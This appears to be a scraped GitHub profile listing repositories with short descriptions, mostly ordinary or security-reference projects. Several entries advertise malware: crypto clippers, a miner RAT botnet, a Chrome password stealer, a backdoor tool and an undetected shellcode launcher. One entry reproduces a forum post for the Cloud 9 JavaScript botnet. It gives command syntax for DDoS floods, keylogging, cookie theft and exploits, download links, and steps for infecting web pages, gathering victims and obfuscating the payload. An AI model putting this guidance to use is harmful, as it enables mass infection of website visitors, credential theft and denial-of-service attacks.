cpt-jack-a-castle Goto Github PK

certstream-go

Go library for connecting to CertStream

certstream-python

Python library for connecting to CertStream

cfunmitigate

cfx-ip-finder

FiveM

ch-miner-ver-4.0-panel-builder

chainforger

Proxy scraper for proxychains

charlotte

c++ fully undetected shellcode launcher ;)

cheat_sheets

Collection of my own Cheat Sheets - mostly for red team and pentesting

cheatsheet-god

Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet

cheatsheets

My cheatsheets

cheatsheetseries

The OWASP Cheat Sheet Series was created to provide a concise collection of high value information on specific application security topics.

chminer

CH Miner BotNet - Hide Miner RAT and Clipper

chrlauncher

Small and very fast portable launcher and updater for Chromium.

chrome-decrypter

Python script to decrypt saved Chrome usernames and passwords on windows

cl0n3r

Clone & download all files from terget websites by any links

cleanrunmru

Get or remove RunMRU values

cleverhans

A library for benchmarking vulnerability to adversarial examples

clickbot

A script written in Python to automate cryptocurrency earning bot on telegram.

client-side-exploitation-

$$ PDF Hacking $$

clipme

Persistent Bitcoin Address Clipper

clipper

clipper-1

A C++ crypto clipper with persistence and mutex

clipper-malware

Analysis of Clipper Malware

cloak

Cloak can backdoor any python script with some tricks.

clone-wars

100+ open-source clones of popular sites like Airbnb, Amazon, Instagram, Netflix, Tiktok, Spotify, Whatsapp, Youtube etc. See source code, demo links, tech stack, github stars.

close-instagram-target-page

We accept the orders to close your Instagram target page in low price

cloud-9-javascript-botnet-version-2.0

I have heavily updated the Cloud 9 JavaScript BotNet Old features: FTP flood Cookie stealing Keylogging Send POST requests Flood POST requests Evaluate JavaScript Code Silently load webpages Clickjacking (iframe follow mouse) New features: Layer 4 / Layer 7 hybrid attack (random min-max size POST flood) Formgrabber fixed (I think) Now has config file Now has bots online list OS detection added Panel is much more sleek You no longer get negative bots when bots repeatedly disconnect or some glitch happens RFI scanner added Added ability to send shellshock exploits You can now open pop-unders Non-DDoS commands run only once Many security updates to the panel The features are: Code Stealerz: cookie clipboard Money makerz: view*[url]* jack*[iframe]*[width]*[height]* popunder*[url]* DDoS Methodz: load*[target url]*[milliseconds between requests]* floodpost*[target url]*[params]*[milliseconds between requests]* glype*[target url]*[glype list url]*[milliseconds between requests]* antiddos*[target url]*[milliseconds between requests]* layer4*[target url]*[minSize-maxSize]*[milliseconds between requests]* Exploitz: exploit*[exe url]* rfiscanner*[target url]*[backdoor url]*[rfi vuln list url]* sendshellshock*[target url]*[command]* Misc: md5*[hash]*[brute length]*[brute alphabet]* sha1*[hash]*[brute length]*[brute alphabet]* post*[url]*[params]* eval*[javascript code]* Always running: Multi-Language Web Keylogger Form Grabber Here is the download link to the botnet (all updates will be here): http://robl0x.cf/cloud9-latest.zip Mirror (will also be updated): http://boatnet.us/Archive/Botnet%20Files...latest.zip Unzip the folder on you server Then edit campaign.js and set master to your servers IP Edit admin/panel4829.php and set a new username and password for the cnc panel One way of getting tons of browsers on your net use traffic exchange sites like hitleap.com or 10khits.com To FTP flood use this command: Code load*ftp://website.com:80/*0* That command will exhaust all of the connections on a webserver with only a few browsers All keylogs that are recorded are sent once the page is closed for stealth To infect a page simply put this html on it: http://pastebin.com/ZAvqJZD8 the first inject is reccommended but it only works if a <head> tag exists on the page. Then whoever visits the page will be on the botnet for as long as they are on the page. I suggest putting a movie on the page so people will stay on the botnet for longer. (Good for ddos attacks) For those of you who dont know the purposes of this botnet are: Website monitoring Ad clicks amd views Getting facebook likes (via clickjacking) Distributed hash cracking Distributed Denial of Service (DDoS) Data stealing IP grabbing Exploiting servers and many more! Here is a picture of an active Cloud 9 botnet with 23 clients (this was before OS detection was added) Spoiler (Click to View) Hope you all love the update! If you have any suggestions for new features send me a PM and I should reply in 1-3 days Here is how to set it up: Code You need to change the master variable in campaign.js to something like this: var master = "http://yoursiteorip"; Also change the connection key for security. var connectKey = "randomshithere"; Also be sure to edit config.php and change the connection key to the one in campaign.js Also in the config it is reccommended that you change the location of the log files and other file locations etc. Be sure to rename/move the files to the places you specified in the config. Once you are done those things obfuscate your campaign.js using this JavaScript obfuscator (or a different one) http://javascriptobfuscator.com/Javascript-Obfuscator.aspx That will protect your campaign.js from people figuring out what it is.

cloud-run-button

Allow your GitHub repos to deploy to Google Cloud Run in a single click

cloud-run-multi-region-terraform

Deploy a Cloud Run app to all available regions using Terraform.

cloud-sql-auth-proxy-iam-mitm

PoC tool to demonstrate an MitM attack against Google's Cloud SQL authentication proxy product.